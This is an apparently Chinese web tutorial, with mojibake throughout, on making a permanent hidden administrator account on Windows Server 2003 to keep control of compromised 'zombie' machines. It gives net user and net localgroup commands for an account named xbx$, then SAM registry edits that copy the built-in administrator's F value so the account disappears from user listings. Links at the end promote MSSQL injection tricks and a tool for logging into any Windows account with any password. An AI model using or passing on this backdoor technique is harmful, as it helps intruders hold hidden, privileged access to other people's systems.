win2003下創(chuàng)建永遠的隱藏帳戶的圖文教程
前段時間比較流行的一句話”肉機”其實要想控制遠端的計算機,那我想就少不了隱藏用戶帳號的問題了,其實創(chuàng)建隱藏用戶帳號還是比較簡單的,現在我就把創(chuàng)建隱藏用戶帳號告訴大家。
其實每一個用戶帳號在注冊表中都有自己帳號數據項
首先我們看看管理員在注冊表中的數據項是什么樣的(如下圖)
圖1
操作一、打開注冊表:HKEY_LOCAL_MACHINE\SAM\SAM
SAM是保存用戶帳號的地方,不過這個“項”在默認情況下是不可見的。我們如果想看內部的內容就必須首先對其授權。(建議對注冊表不是很熟悉的朋友不要隨便改動注冊表)
操作二、認識注冊表中的帳號分類
在OS中的用戶帳號無論是內置帳號,還是后建帳號,在注冊表中都能看見。不過有兩個帳號大家一定要能夠認識,那就是管理員帳號和guest帳號。(如下圖)
圖2
在這個圖中”000001fa4”表示的是管理員帳號,即使管理員帳號被重命名了這個值也是不會變的,所以我們可以通過這個值來判斷,重命名后的管理員帳號。
“000001fa5”表示的是guest帳號,同樣這個值也不會因為,來賓帳號給重命名而改變。剩下的其 它值基本上就是后來創(chuàng)建的用戶帳號,生成值了。 認識了注冊表后,現在我們就來利用”net user”命令創(chuàng)建帳號了,創(chuàng)建隱藏帳號必須在CMD下。利用這組命令的,如果不熟悉這個命令使用的朋友可以參照我的另外一篇文章,就是有關常見命令的時候,不過這些命令也可以在OS的幫助中找到。
操作三、利用”net user”命令創(chuàng)建帳號
一、先建立隱藏用戶 xbx$ 1、net user xbx$ 123,abc /add 這里的意思是說,建立個xbx$ 帳戶密碼是123,abc(如下圖)
圖3
1、C:\Documents and Settings\Administrator>net localgroup administrators xbx$ /add 這里的意思是說把xbx,以便讓我們創(chuàng)建用戶具備管理員權限。
一、觀察注冊表中的變化,并對注冊表做相應的修改。 HKEY_LOCAL_MACHINE\SAM\SAM
1、找到我們剛剛創(chuàng)建的用戶帳號(如圖)
圖4
在這幅圖中我們可以看見”000003f6”就是我們剛新建立的”xbx
2、在注冊表中多帳號權限復制
找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 這個項,打開”000001f4”項,然后再打開”F”(如下圖)。
圖5
然后將這里面的值,全選,粘帖并覆蓋到”000003f6”的”F”值.
3、導出注冊表值
現在將注冊表中的“000001f4”、“000003f6”和“xbx
圖6
4、刪除帳號
接下來我們再次進入“CMD”中刪除“xbx
圖7
刪除帳號后,則注冊表中的值也就沒有了,這個時候我們再把剛才導出的注冊表項,導入到注冊表中。 這個時候我們打開“本地計算機用戶和組”就看不見“xbx
相關文章
MSSQL注入PUBLIC權限下的xp_dirtree再度利用方法
MSSQL注入PUBLIC權限下的xp_dirtree再度利用方法...2007-10-10win2003下創(chuàng)建永遠的隱藏帳戶的圖文教程
win2003下創(chuàng)建永遠的隱藏帳戶的圖文教程...2007-11-11NtGodMode.exe任意密碼登錄windows系統(tǒng)帳號下載
NTGod NT上帝模式,打開上帝模式可以用任意密碼登錄任意windows系統(tǒng)帳號,從而達到不增加帳號、不破壞被入侵主機系統(tǒng)的情況下,登錄系統(tǒng)帳號。2008-05-05